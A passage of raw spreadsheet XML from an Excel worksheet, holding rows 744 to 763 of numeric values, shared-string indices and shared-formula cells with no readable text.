      <c r="C744" s="15"/>
      <c r="D744" s="14"/>
      <c r="E744" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F744" s="14"/>
      <c r="G744" s="29">
        <v>0.0</v>
      </c>
      <c r="H744" s="29">
        <v>3245.0</v>
      </c>
      <c r="I744" s="29">
        <v>122952.0</v>
      </c>
      <c r="J744" s="15"/>
      <c r="K744" s="15"/>
      <c r="L744" s="15"/>
      <c r="M744" s="15"/>
      <c r="N744" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O744" s="29">
        <v>2.0</v>
      </c>
      <c r="P744" s="29">
        <v>0.0</v>
      </c>
      <c r="Q744" s="15"/>
      <c r="R744" s="15"/>
      <c r="S744" s="15"/>
      <c r="T744" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U744" s="5"/>
      <c r="V744" s="5"/>
      <c r="W744" s="47"/>
      <c r="X744" s="45"/>
      <c r="Y744" s="45"/>
      <c r="Z744" s="38" t="s">
        <v>3228</v>
      </c>
      <c r="AA744" s="39" t="s">
        <v>3229</v>
      </c>
      <c r="AB744" s="38" t="s">
        <v>1788</v>
      </c>
      <c r="AC744" s="40">
        <v>135418.0</v>
      </c>
      <c r="AD744" s="5"/>
      <c r="AE744" s="14"/>
      <c r="AF744" s="14"/>
    </row>
    <row r="745">
      <c r="A745" s="6">
        <f t="shared" si="1"/>
        <v>0.9077733519</v>
      </c>
      <c r="B745" s="29">
        <v>1.0</v>
      </c>
      <c r="C745" s="29">
        <v>130532.0</v>
      </c>
      <c r="D745" s="14"/>
      <c r="E745" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F745" s="14"/>
      <c r="G745" s="29">
        <v>22.0</v>
      </c>
      <c r="H745" s="29">
        <v>9203.0</v>
      </c>
      <c r="I745" s="29">
        <v>61169.0</v>
      </c>
      <c r="J745" s="15"/>
      <c r="K745" s="29">
        <v>98538.0</v>
      </c>
      <c r="L745" s="15"/>
      <c r="M745" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N745" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O745" s="29">
        <v>5.0</v>
      </c>
      <c r="P745" s="29">
        <v>6.0</v>
      </c>
      <c r="Q745" s="15"/>
      <c r="R745" s="15"/>
      <c r="S745" s="15"/>
      <c r="T745" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U745" s="5"/>
      <c r="V745" s="5"/>
      <c r="W745" s="47"/>
      <c r="X745" s="45"/>
      <c r="Y745" s="45"/>
      <c r="Z745" s="38" t="s">
        <v>3230</v>
      </c>
      <c r="AA745" s="39" t="s">
        <v>3231</v>
      </c>
      <c r="AB745" s="38" t="s">
        <v>3232</v>
      </c>
      <c r="AC745" s="40">
        <v>130531.0</v>
      </c>
      <c r="AD745" s="5"/>
      <c r="AE745" s="14"/>
      <c r="AF745" s="14"/>
    </row>
    <row r="746">
      <c r="A746" s="6">
        <f t="shared" si="1"/>
        <v>0.003612071569</v>
      </c>
      <c r="B746" s="29">
        <v>1.0</v>
      </c>
      <c r="C746" s="29">
        <v>85493.0</v>
      </c>
      <c r="D746" s="14"/>
      <c r="E746" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F746" s="14"/>
      <c r="G746" s="29">
        <v>4.0</v>
      </c>
      <c r="H746" s="29">
        <v>1271.0</v>
      </c>
      <c r="I746" s="29">
        <v>17012.0</v>
      </c>
      <c r="J746" s="15"/>
      <c r="K746" s="29">
        <v>17012.0</v>
      </c>
      <c r="L746" s="15"/>
      <c r="M746" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N746" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O746" s="29">
        <v>2.0</v>
      </c>
      <c r="P746" s="29">
        <v>2.0</v>
      </c>
      <c r="Q746" s="15"/>
      <c r="R746" s="15"/>
      <c r="S746" s="15"/>
      <c r="T746" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U746" s="5"/>
      <c r="V746" s="5"/>
      <c r="W746" s="47"/>
      <c r="X746" s="45"/>
      <c r="Y746" s="45"/>
      <c r="Z746" s="38" t="s">
        <v>3233</v>
      </c>
      <c r="AA746" s="39" t="s">
        <v>3234</v>
      </c>
      <c r="AB746" s="38" t="s">
        <v>3235</v>
      </c>
      <c r="AC746" s="40">
        <v>85476.0</v>
      </c>
      <c r="AD746" s="5"/>
      <c r="AE746" s="14"/>
      <c r="AF746" s="14"/>
    </row>
    <row r="747">
      <c r="A747" s="6">
        <f t="shared" si="1"/>
        <v>0.0734535058</v>
      </c>
      <c r="B747" s="29">
        <v>1.0</v>
      </c>
      <c r="C747" s="15"/>
      <c r="D747" s="14"/>
      <c r="E747" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F747" s="14"/>
      <c r="G747" s="29">
        <v>0.0</v>
      </c>
      <c r="H747" s="29">
        <v>51.0</v>
      </c>
      <c r="I747" s="29">
        <v>221564.0</v>
      </c>
      <c r="J747" s="15"/>
      <c r="K747" s="29">
        <v>6253.0</v>
      </c>
      <c r="L747" s="15"/>
      <c r="M747" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N747" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O747" s="29">
        <v>0.0</v>
      </c>
      <c r="P747" s="29">
        <v>4.0</v>
      </c>
      <c r="Q747" s="15"/>
      <c r="R747" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S747" s="15"/>
      <c r="T747" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U747" s="5"/>
      <c r="V747" s="5"/>
      <c r="W747" s="47"/>
      <c r="X747" s="45"/>
      <c r="Y747" s="45"/>
      <c r="Z747" s="38" t="s">
        <v>3236</v>
      </c>
      <c r="AA747" s="39" t="s">
        <v>3237</v>
      </c>
      <c r="AB747" s="38" t="s">
        <v>3238</v>
      </c>
      <c r="AC747" s="40">
        <v>221171.0</v>
      </c>
      <c r="AD747" s="5"/>
      <c r="AE747" s="14"/>
      <c r="AF747" s="14"/>
    </row>
    <row r="748">
      <c r="A748" s="6">
        <f t="shared" si="1"/>
        <v>0.2473580411</v>
      </c>
      <c r="B748" s="29">
        <v>1.0</v>
      </c>
      <c r="C748" s="29">
        <v>243.0</v>
      </c>
      <c r="D748" s="14"/>
      <c r="E748" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F748" s="14"/>
      <c r="G748" s="29">
        <v>11.0</v>
      </c>
      <c r="H748" s="29">
        <v>520.0</v>
      </c>
      <c r="I748" s="29">
        <v>89.0</v>
      </c>
      <c r="J748" s="15"/>
      <c r="K748" s="29">
        <v>33.0</v>
      </c>
      <c r="L748" s="15"/>
      <c r="M748" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N748" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O748" s="29">
        <v>4.0</v>
      </c>
      <c r="P748" s="29">
        <v>1.0</v>
      </c>
      <c r="Q748" s="15"/>
      <c r="R748" s="15"/>
      <c r="S748" s="15"/>
      <c r="T748" s="5" t="s">
        <v>51</v>
      </c>
      <c r="U748" s="5"/>
      <c r="V748" s="5"/>
      <c r="W748" s="47"/>
      <c r="X748" s="45"/>
      <c r="Y748" s="45"/>
      <c r="Z748" s="38" t="s">
        <v>3239</v>
      </c>
      <c r="AA748" s="39" t="s">
        <v>3240</v>
      </c>
      <c r="AB748" s="38" t="s">
        <v>3241</v>
      </c>
      <c r="AC748" s="40">
        <v>238.0</v>
      </c>
      <c r="AD748" s="5"/>
      <c r="AE748" s="14"/>
      <c r="AF748" s="14"/>
    </row>
    <row r="749">
      <c r="A749" s="6">
        <f t="shared" si="1"/>
        <v>0.01505688379</v>
      </c>
      <c r="B749" s="29">
        <v>1.0</v>
      </c>
      <c r="C749" s="14"/>
      <c r="D749" s="14"/>
      <c r="E749" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F749" s="14"/>
      <c r="G749" s="29">
        <v>1.0</v>
      </c>
      <c r="H749" s="29">
        <v>124.0</v>
      </c>
      <c r="I749" s="29">
        <v>288845.0</v>
      </c>
      <c r="J749" s="15"/>
      <c r="K749" s="29">
        <v>6253.0</v>
      </c>
      <c r="L749" s="15"/>
      <c r="M749" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N749" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O749" s="29">
        <v>1.0</v>
      </c>
      <c r="P749" s="29">
        <v>0.0</v>
      </c>
      <c r="Q749" s="15"/>
      <c r="R749" s="15"/>
      <c r="S749" s="15"/>
      <c r="T749" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U749" s="5"/>
      <c r="V749" s="5"/>
      <c r="W749" s="47"/>
      <c r="X749" s="45"/>
      <c r="Y749" s="45"/>
      <c r="Z749" s="38" t="s">
        <v>3242</v>
      </c>
      <c r="AA749" s="39" t="s">
        <v>3243</v>
      </c>
      <c r="AB749" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC749" s="40">
        <v>268155.0</v>
      </c>
      <c r="AD749" s="5"/>
      <c r="AE749" s="14"/>
      <c r="AF749" s="14"/>
    </row>
    <row r="750">
      <c r="A750" s="6">
        <f t="shared" si="1"/>
        <v>0.3454509767</v>
      </c>
      <c r="B750" s="29">
        <v>1.0</v>
      </c>
      <c r="C750" s="29">
        <v>218768.0</v>
      </c>
      <c r="D750" s="14"/>
      <c r="E750" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F750" s="14"/>
      <c r="G750" s="29">
        <v>6.0</v>
      </c>
      <c r="H750" s="29">
        <v>1248.0</v>
      </c>
      <c r="I750" s="29">
        <v>59179.0</v>
      </c>
      <c r="J750" s="15"/>
      <c r="K750" s="15"/>
      <c r="L750" s="15"/>
      <c r="M750" s="15"/>
      <c r="N750" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O750" s="29">
        <v>1.0</v>
      </c>
      <c r="P750" s="29">
        <v>3.0</v>
      </c>
      <c r="Q750" s="29">
        <v>0.0</v>
      </c>
      <c r="R750" s="15"/>
      <c r="S750" s="15"/>
      <c r="T750" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U750" s="5"/>
      <c r="V750" s="5"/>
      <c r="W750" s="47"/>
      <c r="X750" s="45"/>
      <c r="Y750" s="45"/>
      <c r="Z750" s="38" t="s">
        <v>3244</v>
      </c>
      <c r="AA750" s="39" t="s">
        <v>3245</v>
      </c>
      <c r="AB750" s="38" t="s">
        <v>3246</v>
      </c>
      <c r="AC750" s="40">
        <v>218767.0</v>
      </c>
      <c r="AD750" s="5"/>
      <c r="AE750" s="14"/>
      <c r="AF750" s="14"/>
    </row>
    <row r="751">
      <c r="A751" s="6">
        <f t="shared" si="1"/>
        <v>0.4429464958</v>
      </c>
      <c r="B751" s="29">
        <v>1.0</v>
      </c>
      <c r="C751" s="15"/>
      <c r="D751" s="14"/>
      <c r="E751" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F751" s="14"/>
      <c r="G751" s="29">
        <v>0.0</v>
      </c>
      <c r="H751" s="29">
        <v>615.0</v>
      </c>
      <c r="I751" s="29">
        <v>99202.0</v>
      </c>
      <c r="J751" s="15"/>
      <c r="K751" s="15"/>
      <c r="L751" s="15"/>
      <c r="M751" s="14"/>
      <c r="N751" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O751" s="29">
        <v>0.0</v>
      </c>
      <c r="P751" s="29">
        <v>2.0</v>
      </c>
      <c r="Q751" s="15"/>
      <c r="R751" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S751" s="15"/>
      <c r="T751" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U751" s="5"/>
      <c r="V751" s="5"/>
      <c r="W751" s="47"/>
      <c r="X751" s="45"/>
      <c r="Y751" s="45"/>
      <c r="Z751" s="38" t="s">
        <v>3247</v>
      </c>
      <c r="AA751" s="39" t="s">
        <v>3248</v>
      </c>
      <c r="AB751" s="38" t="s">
        <v>2897</v>
      </c>
      <c r="AC751" s="40">
        <v>186096.0</v>
      </c>
      <c r="AD751" s="5"/>
      <c r="AE751" s="14"/>
      <c r="AF751" s="14"/>
    </row>
    <row r="752">
      <c r="A752" s="6">
        <f t="shared" si="1"/>
        <v>0.07655647905</v>
      </c>
      <c r="B752" s="29">
        <v>1.0</v>
      </c>
      <c r="C752" s="15"/>
      <c r="D752" s="14"/>
      <c r="E752" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F752" s="14"/>
      <c r="G752" s="29">
        <v>4.0</v>
      </c>
      <c r="H752" s="29">
        <v>34365.0</v>
      </c>
      <c r="I752" s="29">
        <v>4724.0</v>
      </c>
      <c r="J752" s="15"/>
      <c r="K752" s="29">
        <v>4724.0</v>
      </c>
      <c r="L752" s="15"/>
      <c r="M752" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N752" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O752" s="29">
        <v>6.0</v>
      </c>
      <c r="P752" s="29">
        <v>3.0</v>
      </c>
      <c r="Q752" s="15"/>
      <c r="R752" s="15"/>
      <c r="S752" s="15"/>
      <c r="T752" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U752" s="5"/>
      <c r="V752" s="5"/>
      <c r="W752" s="47"/>
      <c r="X752" s="45"/>
      <c r="Y752" s="45"/>
      <c r="Z752" s="38" t="s">
        <v>3249</v>
      </c>
      <c r="AA752" s="39" t="s">
        <v>3250</v>
      </c>
      <c r="AB752" s="38" t="s">
        <v>3251</v>
      </c>
      <c r="AC752" s="40">
        <v>32226.0</v>
      </c>
      <c r="AD752" s="5"/>
      <c r="AE752" s="14"/>
      <c r="AF752" s="14"/>
    </row>
    <row r="753">
      <c r="A753" s="6">
        <f t="shared" si="1"/>
        <v>0.4809765543</v>
      </c>
      <c r="B753" s="29">
        <v>1.0</v>
      </c>
      <c r="C753" s="29">
        <v>165395.0</v>
      </c>
      <c r="D753" s="14"/>
      <c r="E753" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F753" s="14"/>
      <c r="G753" s="29">
        <v>1.0</v>
      </c>
      <c r="H753" s="29">
        <v>1290.0</v>
      </c>
      <c r="I753" s="29">
        <v>151918.0</v>
      </c>
      <c r="J753" s="15"/>
      <c r="K753" s="15"/>
      <c r="L753" s="14"/>
      <c r="M753" s="15"/>
      <c r="N753" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O753" s="29">
        <v>2.0</v>
      </c>
      <c r="P753" s="29">
        <v>1.0</v>
      </c>
      <c r="Q753" s="15"/>
      <c r="R753" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S753" s="15"/>
      <c r="T753" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U753" s="5"/>
      <c r="V753" s="5"/>
      <c r="W753" s="47"/>
      <c r="X753" s="45"/>
      <c r="Y753" s="45"/>
      <c r="Z753" s="38" t="s">
        <v>3252</v>
      </c>
      <c r="AA753" s="39" t="s">
        <v>3253</v>
      </c>
      <c r="AB753" s="38" t="s">
        <v>3254</v>
      </c>
      <c r="AC753" s="40">
        <v>165392.0</v>
      </c>
      <c r="AD753" s="5"/>
      <c r="AE753" s="14"/>
      <c r="AF753" s="14"/>
    </row>
    <row r="754">
      <c r="A754" s="6">
        <f t="shared" si="1"/>
        <v>0.05839535556</v>
      </c>
      <c r="B754" s="29">
        <v>1.0</v>
      </c>
      <c r="C754" s="29">
        <v>181265.0</v>
      </c>
      <c r="D754" s="14"/>
      <c r="E754" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F754" s="14"/>
      <c r="G754" s="29">
        <v>0.0</v>
      </c>
      <c r="H754" s="29">
        <v>6393.0</v>
      </c>
      <c r="I754" s="29">
        <v>71850.0</v>
      </c>
      <c r="J754" s="15"/>
      <c r="K754" s="15"/>
      <c r="L754" s="15"/>
      <c r="M754" s="15"/>
      <c r="N754" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O754" s="29">
        <v>2.0</v>
      </c>
      <c r="P754" s="29">
        <v>4.0</v>
      </c>
      <c r="Q754" s="15"/>
      <c r="R754" s="15"/>
      <c r="S754" s="15"/>
      <c r="T754" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U754" s="5"/>
      <c r="V754" s="5"/>
      <c r="W754" s="47"/>
      <c r="X754" s="45"/>
      <c r="Y754" s="45"/>
      <c r="Z754" s="38" t="s">
        <v>3255</v>
      </c>
      <c r="AA754" s="39" t="s">
        <v>3256</v>
      </c>
      <c r="AB754" s="38" t="s">
        <v>3257</v>
      </c>
      <c r="AC754" s="40">
        <v>181264.0</v>
      </c>
      <c r="AD754" s="5"/>
      <c r="AE754" s="14"/>
      <c r="AF754" s="14"/>
    </row>
    <row r="755">
      <c r="A755" s="6">
        <f t="shared" si="1"/>
        <v>0.2113395374</v>
      </c>
      <c r="B755" s="29">
        <v>1.0</v>
      </c>
      <c r="C755" s="15"/>
      <c r="D755" s="14"/>
      <c r="E755" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F755" s="14"/>
      <c r="G755" s="29">
        <v>0.0</v>
      </c>
      <c r="H755" s="29">
        <v>91.0</v>
      </c>
      <c r="I755" s="29">
        <v>267225.0</v>
      </c>
      <c r="J755" s="15"/>
      <c r="K755" s="29">
        <v>6253.0</v>
      </c>
      <c r="L755" s="15"/>
      <c r="M755" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N755" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O755" s="29">
        <v>0.0</v>
      </c>
      <c r="P755" s="29">
        <v>3.0</v>
      </c>
      <c r="Q755" s="15"/>
      <c r="R755" s="15"/>
      <c r="S755" s="15"/>
      <c r="T755" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U755" s="5"/>
      <c r="V755" s="5"/>
      <c r="W755" s="47"/>
      <c r="X755" s="45"/>
      <c r="Y755" s="45"/>
      <c r="Z755" s="38" t="s">
        <v>3258</v>
      </c>
      <c r="AA755" s="39" t="s">
        <v>3259</v>
      </c>
      <c r="AB755" s="38" t="s">
        <v>3260</v>
      </c>
      <c r="AC755" s="40">
        <v>255280.0</v>
      </c>
      <c r="AD755" s="5"/>
      <c r="AE755" s="14"/>
      <c r="AF755" s="14"/>
    </row>
    <row r="756">
      <c r="A756" s="6">
        <f t="shared" si="1"/>
        <v>0.3337089381</v>
      </c>
      <c r="B756" s="29">
        <v>1.0</v>
      </c>
      <c r="C756" s="29">
        <v>241671.0</v>
      </c>
      <c r="D756" s="14"/>
      <c r="E756" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F756" s="14"/>
      <c r="G756" s="29">
        <v>0.0</v>
      </c>
      <c r="H756" s="29">
        <v>288.0</v>
      </c>
      <c r="I756" s="29">
        <v>246569.0</v>
      </c>
      <c r="J756" s="15"/>
      <c r="K756" s="29">
        <v>6253.0</v>
      </c>
      <c r="L756" s="15"/>
      <c r="M756" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N756" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O756" s="29">
        <v>1.0</v>
      </c>
      <c r="P756" s="29">
        <v>5.0</v>
      </c>
      <c r="Q756" s="15"/>
      <c r="R756" s="15"/>
      <c r="S756" s="15"/>
      <c r="T756" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U756" s="5"/>
      <c r="V756" s="5"/>
      <c r="W756" s="47"/>
      <c r="X756" s="45"/>
      <c r="Y756" s="45"/>
      <c r="Z756" s="38" t="s">
        <v>3261</v>
      </c>
      <c r="AA756" s="39" t="s">
        <v>3262</v>
      </c>
      <c r="AB756" s="38" t="s">
        <v>3263</v>
      </c>
      <c r="AC756" s="40">
        <v>241514.0</v>
      </c>
      <c r="AD756" s="5"/>
      <c r="AE756" s="14"/>
      <c r="AF756" s="14"/>
    </row>
    <row r="757">
      <c r="A757" s="6">
        <f t="shared" si="1"/>
        <v>0.9500211091</v>
      </c>
      <c r="B757" s="29">
        <v>1.0</v>
      </c>
      <c r="C757" s="15"/>
      <c r="D757" s="14"/>
      <c r="E757" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F757" s="14"/>
      <c r="G757" s="29">
        <v>14.0</v>
      </c>
      <c r="H757" s="29">
        <v>2956.0</v>
      </c>
      <c r="I757" s="29">
        <v>146360.0</v>
      </c>
      <c r="J757" s="15"/>
      <c r="K757" s="29">
        <v>146360.0</v>
      </c>
      <c r="L757" s="15"/>
      <c r="M757" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N757" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O757" s="29">
        <v>3.0</v>
      </c>
      <c r="P757" s="29">
        <v>8.0</v>
      </c>
      <c r="Q757" s="15"/>
      <c r="R757" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S757" s="15"/>
      <c r="T757" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U757" s="5"/>
      <c r="V757" s="5"/>
      <c r="W757" s="47"/>
      <c r="X757" s="45"/>
      <c r="Y757" s="45"/>
      <c r="Z757" s="38" t="s">
        <v>3264</v>
      </c>
      <c r="AA757" s="39" t="s">
        <v>3265</v>
      </c>
      <c r="AB757" s="38" t="s">
        <v>3266</v>
      </c>
      <c r="AC757" s="40">
        <v>166164.0</v>
      </c>
      <c r="AD757" s="5"/>
      <c r="AE757" s="14"/>
      <c r="AF757" s="14"/>
    </row>
    <row r="758">
      <c r="A758" s="6">
        <f t="shared" si="1"/>
        <v>0.6196626406</v>
      </c>
      <c r="B758" s="29">
        <v>1.0</v>
      </c>
      <c r="C758" s="29">
        <v>106572.0</v>
      </c>
      <c r="D758" s="14"/>
      <c r="E758" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F758" s="14"/>
      <c r="G758" s="29">
        <v>2.0</v>
      </c>
      <c r="H758" s="29">
        <v>208.0</v>
      </c>
      <c r="I758" s="29">
        <v>18392.0</v>
      </c>
      <c r="J758" s="15"/>
      <c r="K758" s="29">
        <v>18392.0</v>
      </c>
      <c r="L758" s="15"/>
      <c r="M758" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N758" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O758" s="29">
        <v>1.0</v>
      </c>
      <c r="P758" s="29">
        <v>2.0</v>
      </c>
      <c r="Q758" s="15"/>
      <c r="R758" s="15"/>
      <c r="S758" s="15"/>
      <c r="T758" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U758" s="5"/>
      <c r="V758" s="5"/>
      <c r="W758" s="47"/>
      <c r="X758" s="45"/>
      <c r="Y758" s="45"/>
      <c r="Z758" s="38" t="s">
        <v>3267</v>
      </c>
      <c r="AA758" s="39" t="s">
        <v>3268</v>
      </c>
      <c r="AB758" s="38" t="s">
        <v>3269</v>
      </c>
      <c r="AC758" s="40">
        <v>106568.0</v>
      </c>
      <c r="AD758" s="5"/>
      <c r="AE758" s="14"/>
      <c r="AF758" s="14"/>
    </row>
    <row r="759">
      <c r="A759" s="6">
        <f t="shared" si="1"/>
        <v>0.9288502385</v>
      </c>
      <c r="B759" s="29">
        <v>1.0</v>
      </c>
      <c r="C759" s="29">
        <v>111119.0</v>
      </c>
      <c r="D759" s="14"/>
      <c r="E759" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F759" s="14"/>
      <c r="G759" s="29">
        <v>1.0</v>
      </c>
      <c r="H759" s="29">
        <v>510.0</v>
      </c>
      <c r="I759" s="29">
        <v>89672.0</v>
      </c>
      <c r="J759" s="15"/>
      <c r="K759" s="29">
        <v>87119.0</v>
      </c>
      <c r="L759" s="15"/>
      <c r="M759" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N759" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O759" s="29">
        <v>1.0</v>
      </c>
      <c r="P759" s="29">
        <v>3.0</v>
      </c>
      <c r="Q759" s="15"/>
      <c r="R759" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S759" s="15"/>
      <c r="T759" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U759" s="5"/>
      <c r="V759" s="5"/>
      <c r="W759" s="47"/>
      <c r="X759" s="45"/>
      <c r="Y759" s="45"/>
      <c r="Z759" s="38" t="s">
        <v>3270</v>
      </c>
      <c r="AA759" s="39" t="s">
        <v>3271</v>
      </c>
      <c r="AB759" s="38" t="s">
        <v>2485</v>
      </c>
      <c r="AC759" s="40">
        <v>111116.0</v>
      </c>
      <c r="AD759" s="5"/>
      <c r="AE759" s="14"/>
      <c r="AF759" s="14"/>
    </row>
    <row r="760">
      <c r="A760" s="6">
        <f t="shared" si="1"/>
        <v>0.2273275763</v>
      </c>
      <c r="B760" s="29">
        <v>1.0</v>
      </c>
      <c r="C760" s="15"/>
      <c r="D760" s="14"/>
      <c r="E760" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F760" s="14"/>
      <c r="G760" s="29">
        <v>2.0</v>
      </c>
      <c r="H760" s="29">
        <v>124.0</v>
      </c>
      <c r="I760" s="29">
        <v>236914.0</v>
      </c>
      <c r="J760" s="15"/>
      <c r="K760" s="15"/>
      <c r="L760" s="15"/>
      <c r="M760" s="15"/>
      <c r="N760" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O760" s="29">
        <v>2.0</v>
      </c>
      <c r="P760" s="29">
        <v>0.0</v>
      </c>
      <c r="Q760" s="15"/>
      <c r="R760" s="15"/>
      <c r="S760" s="15"/>
      <c r="T760" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U760" s="5"/>
      <c r="V760" s="5"/>
      <c r="W760" s="47"/>
      <c r="X760" s="45"/>
      <c r="Y760" s="45"/>
      <c r="Z760" s="38" t="s">
        <v>3272</v>
      </c>
      <c r="AA760" s="39" t="s">
        <v>3273</v>
      </c>
      <c r="AB760" s="38" t="s">
        <v>3274</v>
      </c>
      <c r="AC760" s="40">
        <v>233484.0</v>
      </c>
      <c r="AD760" s="5"/>
      <c r="AE760" s="14"/>
      <c r="AF760" s="14"/>
    </row>
    <row r="761">
      <c r="A761" s="6">
        <f t="shared" si="1"/>
        <v>0.5789957931</v>
      </c>
      <c r="B761" s="29">
        <v>1.0</v>
      </c>
      <c r="C761" s="14"/>
      <c r="D761" s="14"/>
      <c r="E761" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F761" s="14"/>
      <c r="G761" s="29">
        <v>0.0</v>
      </c>
      <c r="H761" s="29">
        <v>168.0</v>
      </c>
      <c r="I761" s="29">
        <v>160529.0</v>
      </c>
      <c r="J761" s="15"/>
      <c r="K761" s="15"/>
      <c r="L761" s="15"/>
      <c r="M761" s="14"/>
      <c r="N761" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O761" s="29">
        <v>1.0</v>
      </c>
      <c r="P761" s="29">
        <v>0.0</v>
      </c>
      <c r="Q761" s="15"/>
      <c r="R761" s="15"/>
      <c r="S761" s="15"/>
      <c r="T761" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U761" s="5"/>
      <c r="V761" s="5"/>
      <c r="W761" s="47"/>
      <c r="X761" s="45"/>
      <c r="Y761" s="45"/>
      <c r="Z761" s="38" t="s">
        <v>3275</v>
      </c>
      <c r="AA761" s="39" t="s">
        <v>3276</v>
      </c>
      <c r="AB761" s="38" t="s">
        <v>3277</v>
      </c>
      <c r="AC761" s="40">
        <v>243288.0</v>
      </c>
      <c r="AD761" s="5"/>
      <c r="AE761" s="14"/>
      <c r="AF761" s="14"/>
    </row>
    <row r="762">
      <c r="A762" s="6">
        <f t="shared" si="1"/>
        <v>0.4295814669</v>
      </c>
      <c r="B762" s="29">
        <v>1.0</v>
      </c>
      <c r="C762" s="29">
        <v>241141.0</v>
      </c>
      <c r="D762" s="14"/>
      <c r="E762" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F762" s="14"/>
      <c r="G762" s="29">
        <v>77.0</v>
      </c>
      <c r="H762" s="29">
        <v>18445.0</v>
      </c>
      <c r="I762" s="29">
        <v>214750.0</v>
      </c>
      <c r="J762" s="15"/>
      <c r="K762" s="29">
        <v>61948.0</v>
      </c>
      <c r="L762" s="15"/>
      <c r="M762" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N762" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O762" s="29">
        <v>13.0</v>
      </c>
      <c r="P762" s="29">
        <v>9.0</v>
      </c>
      <c r="Q762" s="15"/>
      <c r="R762" s="15"/>
      <c r="S762" s="15"/>
      <c r="T762" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U762" s="5"/>
      <c r="V762" s="5"/>
      <c r="W762" s="47"/>
      <c r="X762" s="45"/>
      <c r="Y762" s="45"/>
      <c r="Z762" s="38" t="s">
        <v>3278</v>
      </c>
      <c r="AA762" s="39" t="s">
        <v>3279</v>
      </c>
      <c r="AB762" s="38" t="s">
        <v>1363</v>
      </c>
      <c r="AC762" s="40">
        <v>241139.0</v>
      </c>
      <c r="AD762" s="5"/>
      <c r="AE762" s="14"/>
      <c r="AF762" s="14"/>
    </row>
    <row r="763">
      <c r="A763" s="6">
        <f t="shared" si="1"/>
        <v>0.1960915184</v>
      </c>
      <c r="B763" s="29">
        <v>1.0</v>
      </c>
      <c r="C763" s="29">
        <v>119647.0</v>
      </c>
      <c r="D763" s="14"/>
      <c r="E763" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F763" s="14"/>
      <c r="G763" s="29">
        <v>69.0</v>
      </c>
      <c r="H763" s="29">
        <v>5145.0</v>
      </c>
      <c r="I763" s="29">
        <v>99028.0</v>
      </c>
      <c r="J763" s="15"/>
      <c r="K763" s="29">
        <v>-1.0</v>
      </c>
      <c r="L763" s="15"/>
      <c r="M763" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N763" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O763" s="29">
        <v>7.0</v>
      </c>
      <c r="P763" s="29">
        <v>16.0</v>
      </c>
      <c r="Q763" s="15"/>
      <c r="R763" s="15"/>
      <c r="S763" s="15"/>
      <c r="T763" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U763" s="5"/>
